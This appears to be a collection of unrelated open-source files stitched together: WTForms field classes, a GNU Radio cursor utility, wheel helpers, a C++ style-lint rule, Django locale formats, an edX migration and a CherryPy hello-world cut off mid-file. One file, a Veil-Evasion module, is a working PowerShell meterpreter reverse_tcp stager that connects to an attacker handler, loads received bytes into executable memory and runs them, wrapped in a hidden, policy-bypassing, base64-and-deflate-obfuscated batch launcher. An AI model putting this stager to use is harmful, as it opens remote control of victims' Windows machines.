opt = self._Option(label=label, id='%s-%d' % (self.id, i), **opts)
opt.process(None, value)
opt.checked = checked
yield opt
class _Option(Field):
checked = False
def _value(self):
return text_type(self.data)
class SelectField(SelectFieldBase):
widget = widgets.Select()
def __init__(self, label=None, validators=None, coerce=text_type, choices=None, **kwargs):
super(SelectField, self).__init__(label, validators, **kwargs)
self.coerce = coerce
self.choices = choices
def iter_choices(self):
for value, label in self.choices:
yield (value, label, self.coerce(value) == self.data)
def process_data(self, value):
try:
self.data = self.coerce(value)
except (ValueError, TypeError):
self.data = None
def process_formdata(self, valuelist):
if valuelist:
try:
self.data = self.coerce(valuelist[0])
except ValueError:
raise ValueError(self.gettext('Invalid Choice: could not coerce'))
def pre_validate(self, form):
for v, _ in self.choices:
if self.data == v:
break
else:
raise ValueError(self.gettext('Not a valid choice'))
class SelectMultipleField(SelectField):
"""
No different from a normal select field, except this one can take (and
validate) multiple choices. You'll need to specify the HTML `size`
attribute to the select field when rendering.
"""
widget = widgets.Select(multiple=True)
def iter_choices(self):
for value, label in self.choices:
selected = self.data is not None and self.coerce(value) in self.data
yield (value, label, selected)
def process_data(self, value):
try:
self.data = list(self.coerce(v) for v in value)
except (ValueError, TypeError):
self.data = None
def process_formdata(self, valuelist):
try:
self.data = list(self.coerce(x) for x in valuelist)
except ValueError:
raise ValueError(self.gettext('Invalid choice(s): one or more data inputs could not be coerced'))
def pre_validate(self, form):
if self.data:
values = list(c[0] for c in self.choices)
for d in self.data:
if d not in values:
raise ValueError(self.gettext("'%(value)s' is not a valid choice for this field") % dict(value=d))
class RadioField(SelectField):
"""
Like a SelectField, except displays a list of radio buttons.
Iterating the field will produce subfields (each containing a label as
well) in order to allow custom rendering of the individual radio fields.
"""
widget = widgets.ListWidget(prefix_label=False)
option_widget = widgets.RadioInput()
class StringField(Field):
"""
This field is the base for most of the more complicated fields, and
represents an ``<input type="text">``.
"""
widget = widgets.TextInput()
def process_formdata(self, valuelist):
if valuelist:
self.data = valuelist[0]
else:
self.data = ''
def _value(self):
return text_type(self.data) if self.data is not None else ''
class LocaleAwareNumberField(Field):
"""
Base class for implementing locale-aware number parsing.
Locale-aware numbers require the 'babel' package to be present.
"""
def __init__(self, label=None, validators=None, use_locale=False, number_format=None, **kwargs):
super(LocaleAwareNumberField, self).__init__(label, validators, **kwargs)
self.use_locale = use_locale
if use_locale:
self.number_format = number_format
self.locale = kwargs['_form'].meta.locales[0]
self._init_babel()
def _init_babel(self):
try:
from babel import numbers
self.babel_numbers = numbers
except ImportError:
raise ImportError('Using locale-aware decimals requires the babel library.')
def _parse_decimal(self, value):
return self.babel_numbers.parse_decimal(value, self.locale)
def _format_decimal(self, value):
return self.babel_numbers.format_decimal(value, self.number_format, self.locale)
class IntegerField(Field):
"""
A text field, except all input is coerced to an integer. Erroneous input
is ignored and will not be accepted as a value.
"""
widget = widgets.TextInput()
def __init__(self, label=None, validators=None, **kwargs):
super(IntegerField, self).__init__(label, validators, **kwargs)
def _value(self):
if self.raw_data:
return self.raw_data[0]
elif self.data is not None:
return text_type(self.data)
else:
return ''
def process_formdata(self, valuelist):
if valuelist:
try:
self.data = int(valuelist[0])
except ValueError:
self.data = None
raise ValueError(self.gettext('Not a valid integer value'))
class DecimalField(LocaleAwareNumberField):
"""
A text field which displays and coerces data of the `decimal.Decimal` type.
:param places:
How many decimal places to quantize the value to for display on form.
If None, does not quantize value.
:param rounding:
How to round the value during quantize, for example
`decimal.ROUND_UP`. If unset, uses the rounding value from the
current thread's context.
:param use_locale:
If True, use locale-based number formatting. Locale-based number
formatting requires the 'babel' package.
:param number_format:
Optional number format for locale. If omitted, use the default decimal
format for the locale.
"""
widget = widgets.TextInput()
def __init__(self, label=None, validators=None, places=unset_value, rounding=None, **kwargs):
super(DecimalField, self).__init__(label, validators, **kwargs)
if self.use_locale and (places is not unset_value or rounding is not None):
raise TypeError("When using locale-aware numbers, 'places' and 'rounding' are ignored.")
if places is unset_value:
places = 2
self.places = places
self.rounding = rounding
def _value(self):
if self.raw_data:
return self.raw_data[0]
elif self.data is not None:
if self.use_locale:
return text_type(self._format_decimal(self.data))
elif self.places is not None:
if hasattr(self.data, 'quantize'):
exp = decimal.Decimal('.1') ** self.places
if self.rounding is None:
quantized = self.data.quantize(exp)
else:
quantized = self.data.quantize(exp, rounding=self.rounding)
return text_type(quantized)
else:
# If for some reason, data is a float or int, then format
# as we would for floats using string formatting.
format = '%%0.%df' % self.places
return format % self.data
else:
return text_type(self.data)
else:
return ''
def process_formdata(self, valuelist):
if valuelist:
try:
if self.use_locale:
self.data = self._parse_decimal(valuelist[0])
else:
self.data = decimal.Decimal(valuelist[0])
except (decimal.InvalidOperation, ValueError):
self.data = None
raise ValueError(self.gettext('Not a valid decimal value'))
class FloatField(Field):
"""
A text field, except all input is coerced to an float. Erroneous input
is ignored and will not be accepted as a value.
"""
widget = widgets.TextInput()
def __init__(self, label=None, validators=None, **kwargs):
super(FloatField, self).__init__(label, validators, **kwargs)
def _value(self):
if self.raw_data:
return self.raw_data[0]
elif self.data is not None:
return text_type(self.data)
else:
return ''
def process_formdata(self, valuelist):
if valuelist:
try:
self.data = float(valuelist[0])
except ValueError:
self.data = None
raise ValueError(self.gettext('Not a valid float value'))
class BooleanField(Field):
"""
Represents an ``<input type="checkbox">``.
:param false_values:
If provided, a sequence of strings each of which is an exact match
string of what is considered a "false" value. Defaults to the tuple
``('false', '')``
"""
widget = widgets.CheckboxInput()
false_values = ('false', '')
def __init__(self, label=None, validators=None, false_values=None, **kwargs):
super(BooleanField, self).__init__(label, validators, **kwargs)
if false_values is not None:
self.false_values = false_values
def process_data(self, value):
self.data = bool(value)
def process_formdata(self, valuelist):
if not valuelist or valuelist[0] in self.false_values:
self.data = False
else:
self.data = True
def _value(self):
if self.raw_data:
return text_type(self.raw_data[0])
else:
return 'y'
class DateTimeField(Field):
"""
A text field which stores a `datetime.datetime` matching a format.
"""
widget = widgets.TextInput()
def __init__(self, label=None, validators=None, format='%Y-%m-%d %H:%M:%S', **kwargs):
super(DateTimeField, self).__init__(label, validators, **kwargs)
self.format = format
def _value(self):
if self.raw_data:
return ' '.join(self.raw_data)
else:
return self.data and self.data.strftime(self.format) or ''
def process_formdata(self, valuelist):
if valuelist:
date_str = ' '.join(valuelist)
try:
self.data = datetime.datetime.strptime(date_str, self.format)
except ValueError:
self.data = None
raise ValueError(self.gettext('Not a valid datetime value'))
class DateField(DateTimeField):
"""
Same as DateTimeField, except stores a `datetime.date`.
"""
def __init__(self, label=None, validators=None, format='%Y-%m-%d', **kwargs):
super(DateField, self).__init__(label, validators, format, **kwargs)
def process_formdata(self, valuelist):
if valuelist:
date_str = ' '.join(valuelist)
try:
self.data = datetime.datetime.strptime(date_str, self.format).date()
except ValueError:
self.data = None
raise ValueError(self.gettext('Not a valid date value'))
class FormField(Field):
"""
Encapsulate a form as a field in another form.
:param form_class:
A subclass of Form that will be encapsulated.
:param separator:
A string which will be suffixed to this field's name to create the
prefix to enclosed fields. The default is fine for most uses.
"""
widget = widgets.TableWidget()
def __init__(self, form_class, label=None, validators=None, separator='-', **kwargs):
super(FormField, self).__init__(label, validators, **kwargs)
self.form_class = form_class
self.separator = separator
self._obj = None
if self.filters:
raise TypeError('FormField cannot take filters, as the encapsulated data is not mutable.')
if validators:
raise TypeError('FormField does not accept any validators. Instead, define them on the enclosed form.')
def process(self, formdata, data=unset_value):
if data is unset_value:
try:
data = self.default()
except TypeError:
data = self.default
self._obj = data
self.object_data = data
prefix = self.name + self.separator
if isinstance(data, dict):
self.form = self.form_class(formdata=formdata, prefix=prefix, **data)
else:
self.form = self.form_class(formdata=formdata, obj=data, prefix=prefix)
def validate(self, form, extra_validators=tuple()):
if extra_validators:
raise TypeError('FormField does not accept in-line validators, as it gets errors from the enclosed form.')
return self.form.validate()
def populate_obj(self, obj, name):
candidate = getattr(obj, name, None)
if candidate is None:
if self._obj is None:
raise TypeError('populate_obj: cannot find a value to populate from the provided obj or input data/defaults')
candidate = self._obj
setattr(obj, name, candidate)
self.form.populate_obj(candidate)
def __iter__(self):
return iter(self.form)
def __getitem__(self, name):
return self.form[name]
def __getattr__(self, name):
return getattr(self.form, name)
@property
def data(self):
return self.form.data
@property
def errors(self):
return self.form.errors
class FieldList(Field):
"""
Encapsulate an ordered list of multiple instances of the same field type,
keeping data as a list.
>>> authors = FieldList(StringField('Name', [validators.required()]))
:param unbound_field:
A partially-instantiated field definition, just like that would be
defined on a form directly.
:param min_entries:
if provided, always have at least this many entries on the field,
creating blank ones if the provided input does not specify a sufficient
amount.
:param max_entries:
accept no more than this many entries as input, even if more exist in
formdata.
"""
widget = widgets.ListWidget()
def __init__(self, unbound_field, label=None, validators=None, min_entries=0,
max_entries=None, default=tuple(), **kwargs):
super(FieldList, self).__init__(label, validators, default=default, **kwargs)
if self.filters:
raise TypeError('FieldList does not accept any filters. Instead, define them on the enclosed field.')
assert isinstance(unbound_field, UnboundField), 'Field must be unbound, not a field class'
self.unbound_field = unbound_field
self.min_entries = min_entries
self.max_entries = max_entries
self.last_index = -1
self._prefix = kwargs.get('_prefix', '')
def process(self, formdata, data=unset_value):
self.entries = []
if data is unset_value or not data:
try:
data = self.default()
except TypeError:
data = self.default
self.object_data = data
if formdata:
indices = sorted(set(self._extract_indices(self.name, formdata)))
if self.max_entries:
indices = indices[:self.max_entries]
idata = iter(data)
for index in indices:
try:
obj_data = next(idata)
except StopIteration:
obj_data = unset_value
self._add_entry(formdata, obj_data, index=index)
else:
for obj_data in data:
self._add_entry(formdata, obj_data)
while len(self.entries) < self.min_entries:
self._add_entry(formdata)
def _extract_indices(self, prefix, formdata):
"""
Yield indices of any keys with given prefix.
formdata must be an object which will produce keys when iterated. For
example, if field 'foo' contains keys 'foo-0-bar', 'foo-1-baz', then
the numbers 0 and 1 will be yielded, but not neccesarily in order.
"""
offset = len(prefix) + 1
for k in formdata:
if k.startswith(prefix):
k = k[offset:].split('-', 1)[0]
if k.isdigit():
yield int(k)
def validate(self, form, extra_validators=tuple()):
"""
Validate this FieldList.
Note that FieldList validation differs from normal field validation in
that FieldList validates all its enclosed fields first before running any
of its own validators.
"""
self.errors = []
# Run validators on all entries within
for subfield in self.entries:
if not subfield.validate(form):
self.errors.append(subfield.errors)
chain = itertools.chain(self.validators, extra_validators)
self._run_validation_chain(form, chain)
return len(self.errors) == 0
def populate_obj(self, obj, name):
values = getattr(obj, name, None)
try:
ivalues = iter(values)
except TypeError:
ivalues = iter([])
candidates = itertools.chain(ivalues, itertools.repeat(None))
_fake = type(str('_fake'), (object, ), {})
output = []
for field, data in izip(self.entries, candidates):
fake_obj = _fake()
fake_obj.data = data
field.populate_obj(fake_obj, 'data')
output.append(fake_obj.data)
setattr(obj, name, output)
def _add_entry(self, formdata=None, data=unset_value, index=None):
assert not self.max_entries or len(self.entries) < self.max_entries, \
'You cannot have more than max_entries entries in this FieldList'
if index is None:
index = self.last_index + 1
self.last_index = index
name = '%s-%d' % (self.short_name, index)
id = '%s-%d' % (self.id, index)
field = self.unbound_field.bind(form=None, name=name, prefix=self._prefix, id=id, _meta=self.meta)
field.process(formdata, data)
self.entries.append(field)
return field
def append_entry(self, data=unset_value):
"""
Create a new entry with optional default data.
Entries added in this way will *not* receive formdata however, and can
only receive object data.
"""
return self._add_entry(data=data)
def pop_entry(self):
""" Removes the last entry from the list and returns it. """
entry = self.entries.pop()
self.last_index -= 1
return entry
def __iter__(self):
return iter(self.entries)
def __len__(self):
return len(self.entries)
def __getitem__(self, index):
return self.entries[index]
@property
def data(self):
return [f.data for f in self.entries]
| bsd-3-clause |
SpectreJan/gnuradio | gnuradio-runtime/python/gnuradio/gru/seq_with_cursor.py | 78 | 2494 | #
# Copyright 2003,2004 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
# misc utilities
import types
import exceptions
class seq_with_cursor (object):
__slots__ = [ 'items', 'index' ]
def __init__ (self, items, initial_index = None, initial_value = None):
assert len (items) > 0, "seq_with_cursor: len (items) == 0"
self.items = items
self.set_index (initial_index)
if initial_value is not None:
self.set_index_by_value(initial_value)
def set_index (self, initial_index):
if initial_index is None:
self.index = len (self.items) / 2
elif initial_index >= 0 and initial_index < len (self.items):
self.index = initial_index
else:
raise exceptions.ValueError
def set_index_by_value(self, v):
"""
Set index to the smallest value such that items[index] >= v.
If there is no such item, set index to the maximum value.
"""
self.set_index(0) # side effect!
cv = self.current()
more = True
while cv < v and more:
cv, more = self.next() # side effect!
def next (self):
new_index = self.index + 1
if new_index < len (self.items):
self.index = new_index
return self.items[new_index], True
else:
return self.items[self.index], False
def prev (self):
new_index = self.index - 1
if new_index >= 0:
self.index = new_index
return self.items[new_index], True
else:
return self.items[self.index], False
def current (self):
return self.items[self.index]
def get_seq (self):
return self.items[:] # copy of items
| gpl-3.0 |
z1gm4/desarrollo_web_udp | env/lib/python2.7/site-packages/wheel/util.py | 345 | 4890 | """Utility functions."""
import sys
import os
import base64
import json
import hashlib
try:
from collections import OrderedDict
except ImportError:
OrderedDict = dict
__all__ = ['urlsafe_b64encode', 'urlsafe_b64decode', 'utf8',
'to_json', 'from_json', 'matches_requirement']
def urlsafe_b64encode(data):
"""urlsafe_b64encode without padding"""
return base64.urlsafe_b64encode(data).rstrip(binary('='))
def urlsafe_b64decode(data):
"""urlsafe_b64decode without padding"""
pad = b'=' * (4 - (len(data) & 3))
return base64.urlsafe_b64decode(data + pad)
def to_json(o):
'''Convert given data to JSON.'''
return json.dumps(o, sort_keys=True)
def from_json(j):
'''Decode a JSON payload.'''
return json.loads(j)
def open_for_csv(name, mode):
if sys.version_info[0] < 3:
nl = {}
bin = 'b'
else:
nl = { 'newline': '' }
bin = ''
return open(name, mode + bin, **nl)
try:
unicode
def utf8(data):
'''Utf-8 encode data.'''
if isinstance(data, unicode):
return data.encode('utf-8')
return data
except NameError:
def utf8(data):
'''Utf-8 encode data.'''
if isinstance(data, str):
return data.encode('utf-8')
return data
try:
# For encoding ascii back and forth between bytestrings, as is repeatedly
# necessary in JSON-based crypto under Python 3
unicode
def native(s):
return s
def binary(s):
if isinstance(s, unicode):
return s.encode('ascii')
return s
except NameError:
def native(s):
if isinstance(s, bytes):
return s.decode('ascii')
return s
def binary(s):
if isinstance(s, str):
return s.encode('ascii')
class HashingFile(object):
def __init__(self, fd, hashtype='sha256'):
self.fd = fd
self.hashtype = hashtype
self.hash = hashlib.new(hashtype)
self.length = 0
def write(self, data):
self.hash.update(data)
self.length += len(data)
self.fd.write(data)
def close(self):
self.fd.close()
def digest(self):
if self.hashtype == 'md5':
return self.hash.hexdigest()
digest = self.hash.digest()
return self.hashtype + '=' + native(urlsafe_b64encode(digest))
class OrderedDefaultDict(OrderedDict):
def __init__(self, *args, **kwargs):
if not args:
self.default_factory = None
else:
if not (args[0] is None or callable(args[0])):
raise TypeError('first argument must be callable or None')
self.default_factory = args[0]
args = args[1:]
super(OrderedDefaultDict, self).__init__(*args, **kwargs)
def __missing__ (self, key):
if self.default_factory is None:
raise KeyError(key)
self[key] = default = self.default_factory()
return default
if sys.platform == 'win32':
import ctypes.wintypes
# CSIDL_APPDATA for reference - not used here for compatibility with
# dirspec, which uses LOCAL_APPDATA and COMMON_APPDATA in that order
csidl = dict(CSIDL_APPDATA=26, CSIDL_LOCAL_APPDATA=28,
CSIDL_COMMON_APPDATA=35)
def get_path(name):
SHGFP_TYPE_CURRENT = 0
buf = ctypes.create_unicode_buffer(ctypes.wintypes.MAX_PATH)
ctypes.windll.shell32.SHGetFolderPathW(0, csidl[name], 0, SHGFP_TYPE_CURRENT, buf)
return buf.value
def save_config_path(*resource):
appdata = get_path("CSIDL_LOCAL_APPDATA")
path = os.path.join(appdata, *resource)
if not os.path.isdir(path):
os.makedirs(path)
return path
def load_config_paths(*resource):
ids = ["CSIDL_LOCAL_APPDATA", "CSIDL_COMMON_APPDATA"]
for id in ids:
base = get_path(id)
path = os.path.join(base, *resource)
if os.path.exists(path):
yield path
else:
def save_config_path(*resource):
import xdg.BaseDirectory
return xdg.BaseDirectory.save_config_path(*resource)
def load_config_paths(*resource):
import xdg.BaseDirectory
return xdg.BaseDirectory.load_config_paths(*resource)
def matches_requirement(req, wheels):
"""List of wheels matching a requirement.
:param req: The requirement to satisfy
:param wheels: List of wheels to search.
"""
try:
from pkg_resources import Distribution, Requirement
except ImportError:
raise RuntimeError("Cannot use requirements without pkg_resources")
req = Requirement.parse(req)
selected = []
for wf in wheels:
f = wf.parsed_filename
dist = Distribution(project_name=f.group("name"), version=f.group("ver"))
if dist in req:
selected.append(wf)
return selected
| gpl-3.0 |
jorik041/Veil-Evasion | modules/payloads/powershell/meterpreter/rev_tcp.py | 4 | 2835 | """
Custom-written pure powershell meterpreter/reverse_tcp stager.
Module @harmj0y
"""
from modules.common import helpers
class Payload:
def __init__(self):
# required options
self.description = "pure windows/meterpreter/reverse_tcp stager, no shellcode"
self.rating = "Excellent"
self.language = "powershell"
self.extension = "bat"
# optional
self.required_options = { "LHOST" : ["", "IP of the metasploit handler"],
"LPORT" : ["4444", "Port of the metasploit handler"]}
def generate(self):
baseString = """$c = @"
[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr w, uint x, uint y, uint z);
[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr u, uint v, IntPtr w, IntPtr x, uint y, IntPtr z);
"@
try{$s = New-Object System.Net.Sockets.Socket ([System.Net.Sockets.AddressFamily]::InterNetwork, [System.Net.Sockets.SocketType]::Stream, [System.Net.Sockets.ProtocolType]::Tcp)
$s.Connect('%s', %s) | out-null; $p = [Array]::CreateInstance("byte", 4); $x = $s.Receive($p) | out-null; $z = 0
$y = [Array]::CreateInstance("byte", [BitConverter]::ToInt32($p,0)+5); $y[0] = 0xBF
while ($z -lt [BitConverter]::ToInt32($p,0)) { $z += $s.Receive($y,$z+5,32,[System.Net.Sockets.SocketFlags]::None) }
for ($i=1; $i -le 4; $i++) {$y[$i] = [System.BitConverter]::GetBytes([int]$s.Handle)[$i-1]}
$t = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru; $x=$t::VirtualAlloc(0,$y.Length,0x3000,0x40)
[System.Runtime.InteropServices.Marshal]::Copy($y, 0, [IntPtr]($x.ToInt32()), $y.Length)
$t::CreateThread(0,0,$x,0,0,0) | out-null; Start-Sleep -Second 86400}catch{}""" %(self.required_options["LHOST"][0], self.required_options["LPORT"][0])
print baseString
encoded = helpers.deflate(baseString)
payloadCode = "@echo off\n"
payloadCode += "if %PROCESSOR_ARCHITECTURE%==x86 ("
payloadCode += "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command \"Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\\\"%s\\\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();\"" % (encoded)
payloadCode += ") else ("
payloadCode += "%%WinDir%%\\syswow64\\windowspowershell\\v1.0\\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command \"Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\\\"%s\\\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();\")" % (encoded)
return payloadCode
| gpl-3.0 |
liuwenf/moose | framework/contrib/nsiqcppstyle/rules/RULE_3_2_B_do_not_use_same_filename_more_than_once.py | 43 | 1934 | """
Do not use same filenames more than once.
== Vilolation ==
/testdir/test1.c
/testdir1/test1.c <== Violation. The filename 'test1' is used two times.
== Good ==
testdir/test.c
testdir1/test1.c
"""
from nsiqcppstyle_reporter import * #@UnusedWildImport
from nsiqcppstyle_rulemanager import * #@UnusedWildImport
import string
filenameMap = {}
def RunRule(lexer, filename, dirname) :
if filename.startswith("stdafx.") :
return
filelist = filenameMap.get(filename, None)
if filelist == None :
filenameMap[filename] = []
filenameMap[filename].append(os.path.join(dirname, filename))
else :
filenameMap[filename].append(os.path.join(dirname, filename))
nsiqcppstyle_reporter.Error(DummyToken(lexer.filename, "", 0, 0), __name__,
'Do not use same filename(%s) more than once. This filename is used in %s' % (filename, string.join(filenameMap[filename], ", ")))
ruleManager.AddFileStartRule(RunRule)
###########################################################################################
# Unit Test
###########################################################################################
from nsiqunittest.nsiqcppstyle_unittestbase import *
class testRule(nct):
def setUpRule(self):
ruleManager.AddFileStartRule(RunRule)
global filenameMap
filenameMap = {}
def test1(self):
self.Analyze("test/thisfile.c", "")
self.Analyze("test2/thisfile.c", "")
assert CheckErrorContent(__name__)
def test2(self):
self.Analyze("test/thisfile.c", "")
self.Analyze("test/thisfile.h", "")
assert not CheckErrorContent(__name__)
def test3(self):
self.Analyze("test/stdafx.h", "")
self.Analyze("test/stdafx.h", "")
self.Analyze("test/thisfile.c", "")
self.Analyze("test/thisfile.h", "")
assert not CheckErrorContent(__name__)
| lgpl-2.1 |
seungjin/app5-seungjin-net.appspot.com | django/conf/locale/ml/formats.py | 341 | 1635 | # -*- encoding: utf-8 -*-
# This file is distributed under the same license as the Django package.
#
# The *_FORMAT strings use the Django date format syntax,
# see http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
DATE_FORMAT = 'N j, Y'
TIME_FORMAT = 'P'
DATETIME_FORMAT = 'N j, Y, P'
YEAR_MONTH_FORMAT = 'F Y'
MONTH_DAY_FORMAT = 'F j'
SHORT_DATE_FORMAT = 'm/d/Y'
SHORT_DATETIME_FORMAT = 'm/d/Y P'
FIRST_DAY_OF_WEEK = 0 # Sunday
# The *_INPUT_FORMATS strings use the Python strftime format syntax,
# see http://docs.python.org/library/datetime.html#strftime-strptime-behavior
DATE_INPUT_FORMATS = (
'%Y-%m-%d', '%m/%d/%Y', '%m/%d/%y', # '2006-10-25', '10/25/2006', '10/25/06'
# '%b %d %Y', '%b %d, %Y', # 'Oct 25 2006', 'Oct 25, 2006'
# '%d %b %Y', '%d %b, %Y', # '25 Oct 2006', '25 Oct, 2006'
# '%B %d %Y', '%B %d, %Y', # 'October 25 2006', 'October 25, 2006'
# '%d %B %Y', '%d %B, %Y', # '25 October 2006', '25 October, 2006'
)
TIME_INPUT_FORMATS = (
'%H:%M:%S', # '14:30:59'
'%H:%M', # '14:30'
)
DATETIME_INPUT_FORMATS = (
'%Y-%m-%d %H:%M:%S', # '2006-10-25 14:30:59'
'%Y-%m-%d %H:%M', # '2006-10-25 14:30'
'%Y-%m-%d', # '2006-10-25'
'%m/%d/%Y %H:%M:%S', # '10/25/2006 14:30:59'
'%m/%d/%Y %H:%M', # '10/25/2006 14:30'
'%m/%d/%Y', # '10/25/2006'
'%m/%d/%y %H:%M:%S', # '10/25/06 14:30:59'
'%m/%d/%y %H:%M', # '10/25/06 14:30'
'%m/%d/%y', # '10/25/06'
)
DECIMAL_SEPARATOR = '.'
THOUSAND_SEPARATOR = ','
NUMBER_GROUPING = 3
| bsd-3-clause |
MakeHer/edx-platform | common/djangoapps/microsite_configuration/migrations/0001_initial.py | 41 | 5458 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
import jsonfield.fields
import django.db.models.deletion
from django.conf import settings
import model_utils.fields
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('sites', '0001_initial'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='HistoricalMicrositeOrganizationMapping',
fields=[
('id', models.IntegerField(verbose_name='ID', db_index=True, auto_created=True, blank=True)),
('organization', models.CharField(max_length=63, db_index=True)),
('history_id', models.AutoField(serialize=False, primary_key=True)),
('history_date', models.DateTimeField()),
('history_type', models.CharField(max_length=1, choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')])),
('history_user', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL, null=True)),
],
options={
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
'verbose_name': 'historical microsite organization mapping',
},
),
migrations.CreateModel(
name='HistoricalMicrositeTemplate',
fields=[
('id', models.IntegerField(verbose_name='ID', db_index=True, auto_created=True, blank=True)),
('template_uri', models.CharField(max_length=255, db_index=True)),
('template', models.TextField()),
('history_id', models.AutoField(serialize=False, primary_key=True)),
('history_date', models.DateTimeField()),
('history_type', models.CharField(max_length=1, choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')])),
('history_user', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL, null=True)),
],
options={
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
'verbose_name': 'historical microsite template',
},
),
migrations.CreateModel(
name='Microsite',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('key', models.CharField(unique=True, max_length=63, db_index=True)),
('values', jsonfield.fields.JSONField(blank=True)),
('site', models.OneToOneField(related_name='microsite', to='sites.Site')),
],
),
migrations.CreateModel(
name='MicrositeHistory',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, verbose_name='created', editable=False)),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, verbose_name='modified', editable=False)),
('key', models.CharField(unique=True, max_length=63, db_index=True)),
('values', jsonfield.fields.JSONField(blank=True)),
('site', models.OneToOneField(related_name='microsite_history', to='sites.Site')),
],
options={
'verbose_name_plural': 'Microsite histories',
},
),
migrations.CreateModel(
name='MicrositeOrganizationMapping',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('organization', models.CharField(unique=True, max_length=63, db_index=True)),
('microsite', models.ForeignKey(to='microsite_configuration.Microsite')),
],
),
migrations.CreateModel(
name='MicrositeTemplate',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('template_uri', models.CharField(max_length=255, db_index=True)),
('template', models.TextField()),
('microsite', models.ForeignKey(to='microsite_configuration.Microsite')),
],
),
migrations.AddField(
model_name='historicalmicrositetemplate',
name='microsite',
field=models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to='microsite_configuration.Microsite', null=True),
),
migrations.AddField(
model_name='historicalmicrositeorganizationmapping',
name='microsite',
field=models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to='microsite_configuration.Microsite', null=True),
),
migrations.AlterUniqueTogether(
name='micrositetemplate',
unique_together=set([('microsite', 'template_uri')]),
),
]
| agpl-3.0 |
ll011234ll/--2014cp_project_40323247 | helloworld.py | 73 | 3294 | # coding=utf-8
# 上面的程式內容編碼必須在程式的第一或者第二行才會有作用
################# (1) 模組導入區
# 導入 cherrypy 模組, 為了在 OpenShift 平台上使用 cherrypy 模組, 必須透過 setup.py 安裝
import cherrypy
# 導入 Python 內建的 os 模組, 因為 os 模組為 Python 內建, 所以無需透過 setup.py 安裝
import os
################# (2) 廣域變數設定區
# 確定程式檔案所在目錄, 在 Windows 下有最後的反斜線
_curdir = os.path.join(os.getcwd(), os.path.dirname(__file__))
# 設定在雲端與近端的資料儲存目錄
if 'OPENSHIFT_REPO_DIR' in os.environ.keys():
# 表示程式在雲端執行
download_root_dir = os.environ['OPENSHIFT_DATA_DIR']
data_dir = os.environ['OPENSHIFT_DATA_DIR']
else:
# 表示程式在近端執行
download_root_dir = _curdir + "/local_data/"
data_dir = _curdir + "/local_data/"
'''以下為近端 input() 與 for 迴圈應用的程式碼, 若要將程式送到 OpenShift 執行, 除了採用 CherryPy 網際框架外, 還要轉為 html 列印
# 利用 input() 取得的資料型別為字串
toprint = input("要印甚麼內容?")
# 若要將 input() 取得的字串轉為整數使用, 必須利用 int() 轉換
repeat_no = int(input("重複列印幾次?"))
for i in range(repeat_no):
print(toprint)
'''
################# (3) 程式類別定義區
# 以下改用 CherryPy 網際框架程式架構
# 以下為 Hello 類別的設計內容, 其中的 object 使用, 表示 Hello 類別繼承 object 的所有特性, 包括方法與屬性設計
class Hello(object):
# Hello 類別的啟動設定
_cp_config = {
'tools.encode.encoding': 'utf-8',
'tools.sessions.on' : True,
'tools.sessions.storage_type' : 'file',
'tools.sessions.locking' : 'explicit',
# session 以檔案儲存, 而且位於 data_dir 下的 tmp 目錄
'tools.sessions.storage_path' : data_dir+'/tmp',
# session 有效時間設為 60 分鐘
'tools.sessions.timeout' : 60
}
# 以 @ 開頭的 cherrypy.expose 為 decorator, 用來表示隨後的成員方法, 可以直接讓使用者以 URL 連結執行
@cherrypy.expose
# index 方法為 CherryPy 各類別成員方法中的內建(default)方法, 當使用者執行時未指定方法, 系統將會優先執行 index 方法
# 有 self 的方法為類別中的成員方法, Python 程式透過此一 self 在各成員方法間傳遞物件內容
def index(self, toprint="Hello World!"):
return toprint
################# (4) 程式啟動區
# 配合程式檔案所在目錄設定靜態目錄或靜態檔案
application_conf = {'/static':{
'tools.staticdir.on': True,
# 程式執行目錄下, 必須自行建立 static 目錄
